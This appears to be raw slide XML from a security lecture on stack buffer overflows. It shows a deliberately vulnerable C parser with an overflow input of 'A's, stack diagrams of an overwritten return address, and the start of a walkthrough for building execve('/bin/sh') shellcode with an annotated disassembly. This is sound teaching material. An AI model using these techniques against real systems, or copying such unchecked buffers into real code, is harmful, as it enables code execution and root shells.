                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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284270"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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560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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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499754"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000019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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="1614544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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAA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134" y="497053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(input file)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8132" y="6287644"/>
            <a:ext cx="96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Uh oh….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7364236" y="2586574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358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Right Arrow 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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-83929" y="1613624"/>
            <a:ext cx="87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58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6376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What are buffer overflows?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520575"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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247668"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="38543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5608"/>
              </a:tblGrid>
              <a:tr h="72360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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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034923"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000025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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="783509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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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2793" y="5513748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GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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8132" y="6287644"/>
            <a:ext cx="96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Uh oh….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7364236" y="2586574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 Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Right Arrow 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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-83929" y="1613624"/>
            <a:ext cx="87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1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622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6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6376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What are buffer overflows?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822748"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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99868" y="2411857"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]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[7,6,5,4]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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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header_ok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367292" y="17451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65019" y="2011487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365018" y="229642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68613" y="27477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66341" y="292459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366339" y="311184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364066" y="3288671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366339" y="376104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366339" y="394225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366339" y="4129503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66339" y="43004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19899" y="1839880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09486" y="2146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66433" y="2384169"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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39855" y="4914254"/>
            <a:ext cx="325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in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8874" y="5245626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7628432" y="5578051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409948" y="51011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407675" y="54302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407674" y="576225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639733" y="5887249"/>
            <a:ext cx="228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i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7418975" y="607145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274572"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="393780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5608"/>
              </a:tblGrid>
              <a:tr h="72360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5978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0x00000000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41414141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0x20544547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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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791301"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4629921"/>
          <a:ext cx="1432247" cy="261308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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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0x00000025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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4627617"/>
            <a:ext cx="44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out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7389894" y="481453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731200" y="4657865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0xbffff6b4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20787" y="4964949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726823" y="5280663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716410" y="558774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727712" y="592830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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4291962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3929" y="4020078"/>
            <a:ext cx="87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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Right Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4244250" y="783509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15524" y="1568922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0xbffff760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03810" y="4966132"/>
            <a:ext cx="4201615" cy="9138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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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22793" y="5513748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GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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134" y="497053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(input file)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8132" y="5986836"/>
            <a:ext cx="400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And when you try to return from parse…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7364236" y="2586574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90151" y="6211669"/>
            <a:ext cx="4154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… SEGFAULT, since 0x61616161 is not  a valid location to return to.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15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7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Basic Stack Exploit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963" y="1600200"/>
            <a:ext cx="897691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Overwriting the return address allows an attacker to redirect the flow of program control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Instead of crashing, this can allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> code to be executed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Code segment called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> system call is used to execute a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>With the correct permissions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>”) can be used to obtain a root-level shell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3905325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rgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r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 of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>execve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84" y="1600200"/>
            <a:ext cx="9087816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How to develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> that runs as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="28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50128" y="2764282"/>
            <a:ext cx="2539768" cy="149271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300" dirty="0" smtClean="0"/>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>   char *name[2];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>   name[0] = "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>   name[1] = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>(name[0], name, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770419" y="2515895"/>
            <a:ext cx="4323454" cy="35466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dirty="0"/>
              <a:t>0x80002bc &lt;__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>&gt;:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>0x80002bd &lt;__execve+1&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>0x80002bf &lt;__execve+3&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx</a:t>
            </a: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1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The procedure prelude.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>0x80002c0 &lt;__execve+4&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>   $0xb,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>eax</a:t>
            </a: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1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy 0xb (11 decimal) onto the stack. This is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table.  11 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execve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80000"/>
              </a:lnSpc>
            </a:pP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1400" b="1" dirty="0"/>
              <a:t>0x80002c5 &lt;__execve+9&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>   0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx</a:t>
            </a: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1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy the address of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" into EBX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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1400" b="1" dirty="0"/>
